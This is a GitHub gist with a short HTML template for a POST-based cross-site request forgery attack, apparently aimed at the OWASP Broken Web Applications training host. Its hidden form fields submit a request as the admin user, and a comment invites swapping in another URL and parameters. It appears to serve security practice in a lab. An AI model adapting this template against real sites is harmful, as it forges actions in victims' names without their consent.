Created
August 11, 2019 18:27
-
-
Save jakekarnes42/2722525274b30e0bd478f028c1408a70 to your computer and use it in GitHub Desktop.
Simple template for POST-based CSRF
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
<html> | |
<body> | |
<!–– Change URL and params below--> | |
<form method="POST" action="http://owaspbwa/ghost/blogView.php"> | |
<input type="hidden" name="vuln" value="me so dumb"/> | |
<input type="hidden" name="user" value="admin"/> | |
<input type="submit" value="Submit"> | |
</form> | |
</body> | |
<html> |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment